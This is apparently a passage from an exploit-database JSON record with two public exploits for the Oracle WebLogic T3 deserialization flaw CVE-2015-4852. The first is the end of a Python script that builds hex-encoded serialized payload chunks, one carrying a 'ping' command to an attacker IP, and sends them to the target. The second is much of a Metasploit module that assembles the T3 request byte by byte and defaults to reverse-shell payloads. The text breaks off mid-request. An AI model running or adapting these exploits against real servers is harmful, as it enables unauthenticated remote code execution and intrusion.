\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6
e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x19\\x70\\x69\\x6e\\x67\\x20\\x2d\\x63\\x20\\x34\\x20\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x32\\x35\\x33\\x2e\\x31\\x33\\x30\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x23\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a\" \n \n \nchunk3 = 
'\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x6
6\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78' \n \ntotallength = len(chunk1) + len(chunk2) + len(chunk3) \nprint \"[+]TOTAL payload length: \", totallength \n \n#Update the TOTAL payload length in Chunk1 \nlen_hex = hex(totallength) \nprint \"[+]Payload length in HEX: \", len_hex \nlen_hex = len_hex.replace('0x', 
'0') \nprint \"[+]Payload length in HEX: \" , len_hex \n \ns1 = len_hex[:2] \ns2 = len_hex[2:4] \nlen_hex = unhexlify(s1 + s2) \n \nprint \"[+]Payload length in HEX now: \", len_hex \n \n#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2) \nprint \"[+]Updating Chunk1 according to the TOTAL payload length...\" \n \nchunk1 = '\\x00\\x00' + len_hex + '\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x
67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00' \n \n#print \"[+]Updated 'chunk1' : \\n\", chunk1 \n \n#Get the final payload. This should have appropriate TOTAL payload length in 'chunk1' \npayload = chunk1 + chunk2 + chunk3 \n \n#Adjust header for appropriate message length \npayload = \"{0}{1}\".format(struct.pack('!i', len(payload)), payload[4:]) \nprint '[+]Sending payload...' \nsock.send(payload) \n \nprint \"[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!\" \nprint(\"\\n[+]Response to Request#: \\n\") \nresponse = sock.recv(15000) \nprint(response) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144405/oracleweblogic12-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-28T22:53:29", "description": "", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Oracle Weblogic Server Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152268", "href": "https://packetstormsecurity.com/files/152268/Oracle-Weblogic-Server-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/exploit/powershell' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Tcp \n#include Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Powershell \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Oracle Weblogic Server 
Deserialization RCE - Raw Object', \n'Description' => %q{ \nAn unauthenticated attacker with network access to the Oracle Weblogic Server T3 \ninterface can send a serialized object (weblogic.jms.common.StreamMessageImpl) \nto the interface to execute code on vulnerable hosts. \n}, \n'Author' => \n[ \n'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com) \n'Stephen Breen', # Vulnerability Discovery \n'Aaron Soto' # Reverse Engineering JSO and ysoserial blobs \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2015-4852'] \n], \n'Privileged' => false, \n'Platform' => %w{ unix win solaris }, \n'Targets' => \n[ \n[ 'Unix', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}, \n'Payload' => { \n'Encoder' => 'cmd/ifs', \n'BadChars' => ' ', \n'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'} \n} \n], \n[ 'Windows', \n'Platform' => 'win', \n'Payload' => {}, \n'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'} \n], \n[ 'Solaris', \n'Platform' => 'solaris', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}, \n'Payload' => { \n'Space' => 2048, \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl telnet', \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 28 2015')) \n \nregister_options([Opt::RPORT(7001)]) \nend \n \n=begin This check is currently incompatible with the Tcp mixin. 
:-( \ndef check \nresp = send_request_cgi( \n'method' => 'GET', \n'uri' => '/console/login/LoginForm.jsp' \n) \n \nreturn CheckCode::Unknown unless resp && resp.code == 200 \n \nunless resp.body.include?('Oracle WebLogic Server Administration Console') \nvprint_warning(\"Oracle WebLogic Server banner cannot be found\") \nreturn CheckCode::Unknown \nend \n \n/WebLogic Server Version: (?<version>\\d+\\.\\d+\\.\\d+\\.\\d*)/ =~ resp.body \nunless version \nvprint_warning(\"Oracle WebLogic Server version cannot be found\") \nreturn CheckCode::Unknown \nend \n \nversion = Gem::Version.new(version) \nvprint_good(\"Detected Oracle WebLogic Server Version: #{version}\") \ncase \nwhen version.to_s.start_with?('10.3') \nreturn CheckCode::Appears unless version > Gem::Version.new('10.3.6.0') \nwhen version.to_s.start_with?('12.1.2') \nreturn CheckCode::Appears unless version > Gem::Version.new('12.1.2.0') \nwhen version.to_s.start_with?('12.1.3') \nreturn CheckCode::Appears unless version > Gem::Version.new('12.1.3.0') \nwhen version.to_s.start_with?('12.2') \nreturn CheckCode::Appears unless version > Gem::Version.new('12.2.1.0') \nend \n \nreturn CheckCode::Safe \nend \n=end \n \ndef t3_handshake \n# retrieved from network traffic \nshake = \"t3 12.2.1\\n\" \nshake << \"AS:255\\n\" \nshake << \"HL:19\\n\" \nshake << \"MS:10000000\\n\\n\" \n \nsock.put(shake) \nsleep(1) \nsock.get_once \nend \n \ndef build_t3_request_object \n# T3 request serialized data \n# retrieved by watching network traffic \n# This is a proprietary, undocumented protocol \n \n# TODO: Cite a source for the dissection of in the following 14 lines: \ndata = '000005c3' # length of the packet \ndata << '01' # CMD_IDENTIFY_REQUEST \ndata << '65' # QOS \ndata << '01' # Flags: \n# CONTEXT_JVMID_FLAG = 1 (has JVMIDs) \n# CONTEXT_TX_FLAG = 2 \n# CONTEXT_TRACE_FLAG = 4 \n# CONTEXT_EXTENDED_FLAG = 8 \n# CONTEXT_EXTENDED_USER_FLAG = 16 \ndata << 'ffffffff' # response id \ndata << 'ffffffff' # invocable id \ndata << 
'0000006a' # abbrev offset \ndata << '0000ea60' # reconnect timeout ?? \n \ndata << '0000001900937b484a' \ndata << '56fa4a777666f581daa4f5b90e2aebfc607499' \ndata << 'b4027973720078720178720278700000000a00' \ndata << '00000300000000000000060070707070707000' \ndata << '00000a000000030000000000000006007006' \n \ndata << 'fe010000' # ----- separator ----- \n \ndata << 'aced0005' # JSO v5 header \ndata << '73' # object header \ndata << '72001d' # className (29 bytes): \ndata << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry \ndata << '5461626c65456e747279' # (continued) \ndata << '2f52658157f4f9ed' # serialVersionUID \ndata << '0c00007870' # remainder of object header \ndata << '72' # object header \ndata << '00247765626c6f6769632e636f6d6d6f6e2e696e74' # className (36 bytes): weblogic.common.internal.PackageInfo \ndata << '65726e616c2e5061636b616765496e666f' # (continued) \ndata << 'e6f723e7b8ae1ec9' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0008' # fieldCount = 8 \ndata << '4900056d616a6f72' # 0: Int: major \ndata << '4900056d696e6f72' # 1: Int: minor \ndata << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch \ndata << '49000b736572766963655061636b' # 3: Int: servicePack \ndata << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch \ndata << '4c0009696d706c5469746c65' # 5: Obj: implTitle \ndata << '7400124c6a6176612f6c616e672f537472696e673b' # java/lang/String \ndata << '4c000a696d706c56656e646f72' # 6: Obj: implVendor \ndata << '71007e0003' # (Handle) 0x007e0003 \ndata << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion \ndata << '71007e0003' # (Handle) 0x007e0003 \ndata << '78707702000078' # block footers \n \ndata << 'fe010000' # ----- separator ----- \n \ndata << 'aced0005' # JSO v5 header \ndata << '7372' # object header \ndata << '001d7765626c6f6769632e726a766d2e436c6173' # className (29 bytes): weblogic.rjvm.ClassTableEntry \ndata << '735461626c65456e747279' # (continued) \ndata << 
'2f52658157f4f9ed' # serialVersionUID \ndata << '0c' # EXTERNALIZABLE | BLOCKDATA \ndata << '00007870' # remainder of object header \ndata << '72' # object header \ndata << '00247765626c6f6769632e636f6d6d6f6e2e696' # className (36 bytes): weblogic.common.internal.VersionInfo \ndata << 'e7465726e616c2e56657273696f6e496e666f' # (continued) \ndata << '972245516452463e' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0003' # fieldCount = 3 \ndata << '5b0008' # array header (8 bytes) \ndata << '7061636b61676573' # ARRAY NAME = 'packages' \ndata << '740027' # TC_STRING className1 (39 bytes) \ndata << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # weblogic/common/internal/PackageInfo \ndata << '6e7465726e616c2f5061636b616765496e666f' # (continued) \ndata << '3b' # (continued) \ndata << '4c000e' # object header (14 bytes) \ndata << '72656c6561736556657273696f6e' # releaseVersion \ndata << '740012' # TC_STRING (18 bytes) \ndata << '4c6a6176612f6c616e672f537472696e673b' # versionInfoAsBytes \ndata << '5b0012' # array header (18 bytes) \ndata << '76657273696f6e496e666f41734279746573' # ARRAY NAME = java/lang/String; \ndata << '740002' # TC_STRING (2 bytes) \ndata << '5b42' # 0x5b42 = [B \ndata << '78' # block footer \n \ndata << '720024' # class (36 bytes) \ndata << '7765626c6f6769632e636f6d6d6f6e2e696e' # weblogic.common.internal.PackageInfo \ndata << '7465726e616c2e5061636b616765496e666f' # (continued) \ndata << 'e6f723e7b8ae1ec9' # serialVersionUID \n \ndata << '02' # SC_SERIALIZABLE \ndata << '0008' # fieldCount = 8 \ndata << '4900056d616a6f72' # 0: Int: major \ndata << '4900056d696e6f72' # 1: Int: minor \ndata << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch \ndata << '49000b736572766963655061636b' # 3: Int: servicePack \ndata << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch \ndata << '4c0009696d706c5469746c65' # 5: Obj: implTitle \ndata << '71' # TC_REFERENCE \ndata << '007e0004' # Handle = 0x007e0004 \ndata << 
'4c000a696d706c56656e646f72' # 6: Obj: implVendor \ndata << '71' # TC_REFERENCE \ndata << '007e0004' # Handle = 0x007e0004 \ndata << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion \ndata << '71' # TC_REFERENCE \ndata << '007e0004' # Handle = 0x007e0004 \ndata << '78' # class footer \ndata << '70' # TC_NULL \ndata << '77020000' # BLOCKDATA (2 bytes): 0x0000 \ndata << '78' # block footer \n \ndata << 'fe010000' # ----- separator ----- \n \ndata << 'aced0005' # JSO v5 header \ndata << '73' # object header \ndata << '72001d' # className (29 bytes): \ndata << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry \ndata << '5461626c65456e747279' # (continued) \ndata << '2f52658157f4f9ed' # serialVersionUID \ndata << '0c00007870' # remainder of object header \ndata << '720021' # className (33 bytes) \ndata << '7765626c6f6769632e636f6d6d6f6e2e696e74' # weblogic.common.internal.PeerInfo \ndata << '65726e616c2e50656572496e666f' # (continued) \ndata << '585474f39bc908f1' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0006' # fieldCount = 6 \ndata << '4900056d616a6f72' # 0: Int: major \ndata << '4900056d696e6f72' # 1: Int: minor \ndata << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch \ndata << '49000b736572766963655061636b' # 3: Int: servicePack \ndata << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch \ndata << '5b00087061636b61676573' # 5: Array: packages \ndata << '740027' # TC_STRING (39 bytes) \ndata << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # Lweblogic/common/internal/PackageInfo; \ndata << '6e7465726e616c2f5061636b616765496e666f' # (continued) \ndata << '3b' # (continued) \ndata << '78' # block footer \ndata << '720024' # class header \ndata << '7765626c6f6769632e636f6d6d6f6e2e696e74' # Name = Lweblogic/common/internal/PackageInfo; \ndata << '65726e616c2e56657273696f6e496e666f' # (continued) \ndata << '972245516452463e' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0003' # fieldCount = 3 
\ndata << '5b0008' # 0: Array \ndata << '7061636b6167657371' # packages \ndata << '007e0003' # Handle = 0x00730003 \ndata << '4c000e72656c6561736556657273696f6e' # 1: Obj: releaseVersion \ndata << '7400124c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String; \ndata << '5b001276657273696f6e496e666f41734279746573' # 2: Array: versionInfoAsBytes \ndata << '740002' # TC_STRING (2 bytes) \ndata << '5b42' # VALUE = 0x5b42 = [B \ndata << '78' # block footer \ndata << '720024' # class header \ndata << '7765626c6f6769632e636f6d6d6f6e2e696e746572' # Name = weblogic.common.internal.PackageInfo \ndata << '6e616c2e5061636b616765496e666f' # (continued) \ndata << 'e6f723e7b8ae1ec9' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0008' # fieldCount = 8 \ndata << '4900056d616a6f72' # 0: Int: major \ndata << '4900056d696e6f72' # 1: Int: minor \ndata << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch \ndata << '49000b736572766963655061636b' # 3: Int: servicePack \ndata << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch \ndata << '4c0009696d706c5469746c65' # 5: Obj: implTitle \ndata << '71' # TC_REFERENCE \ndata << '007e0005' # Handle = 0x007e0005 \ndata << '4c000a696d706c56656e646f72' # 6: Obj: implVendor \ndata << '71' # TC_REFERENCE \ndata << '007e0005' # Handle = 0x007e0005 \ndata << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion \ndata << '71' # TC_REFERENCE \ndata << '007e0005' # Handle = 0x007e0005 \ndata << '78' # class footer \ndata << '707702000078' # block footers \n \ndata << 'fe00ff' # this cruft again. some kind of footer \n \ndata << 'fe010000' # ----- separator ----- \n \n# weblogic.rjvm.JVMID object \ndata << 'aced0005' # JSO v5 header \ndata << '73' # object header \ndata << '720013' # class header \ndata << '7765626c6f6769632e726a766d2e4a564d4944' # name = 'weblogic.rjvm.JVMID' \ndata << 'dc49c23ede121e2a' # serialVersionUID \ndata << '0c' # EXTERNALIZABLE | BLOCKDATA \ndata << '0000' # fieldCount = 0 (!!!) 
\ndata << '78' # block footer \ndata << '70' # NULL \ndata << '7750' # block header (80 bytes) \ndata << '21' # ! \ndata << '000000000000000000' # 9 NULL BYTES \n \ndata << '0d' # strLength = 13 bytes \n#data << '3139322e3136382e312e323237' # original PoC string = 192.168.1.227 \ndata << '3030302e3030302e3030302e30' # new string = 000.000.000.0 \n# (must be an IP, and length isn't trivially editable) \ndata << '00' # \\0 \n \ndata << '12' # strLength = 18 bytes \n#data << '57494e2d4147444d565155423154362e6568' # original str = WIN-AGDMVQUB1T6.eh \ndata << rand_text_alphanumeric(18).unpack('H*')[0] \n \ndata << '83348cd6' # original = ??? UNKNOWN ??? (Note: Cannot be randomized) \n \ndata << '000000070000' # ??? UNKNOWN ??? \ndata << rport.to_s(16).rjust(4, '0') # callback port \ndata << 'ffffffffffffffffffffffffffffffffffffff' # ??? UNKNOWN ??? \ndata << 'ffffffffff' # ??? UNKNOWN ??? \ndata << '78' # block footer \n \ndata << 'fe010000' # ----- separator ----- \n \n# weblogic.rjvm.JVMID object \ndata << 'aced0005' # JSO v5 header \ndata << '73' # object header \ndata << '72' # class \ndata << '00137765626c6f6769632e726a766d2e4a564d4944' # Name: weblogic.rjvm.JVMID \ndata << 'dc49c23ede121e2a' # serialVersionUID \ndata << '0c' # EXTERNALIZABLE | BLOCKDATA \ndata << '0000' # fieldCount = 0 \ndata << '78' # end block \ndata << '70' # TC_NULL \ndata << '77' # block header \ndata << '20' # length = 32 bytes \ndata << '0114dc42bd071a772700' # old string = ??? UNKNOWN ??? \n#data << rand_text_alphanumeric(10).unpack('H*')[0] # (NOTE: RANDOMIZATION BREAKS THINGS) \n \ndata << '0d' # string length = 13 bytes (NOTE: do not edit) \n#data << '3234322e3231342e312e323534' # original string = 242.214.1.254 \ndata << '3030302e3030302e3030302e30' # new string = 000.000.000.0 \n# (must be an IP, and length isn't trivially editable) \n \n#data << '61863d1d' # original string = ??? UNKNOWN ??? 
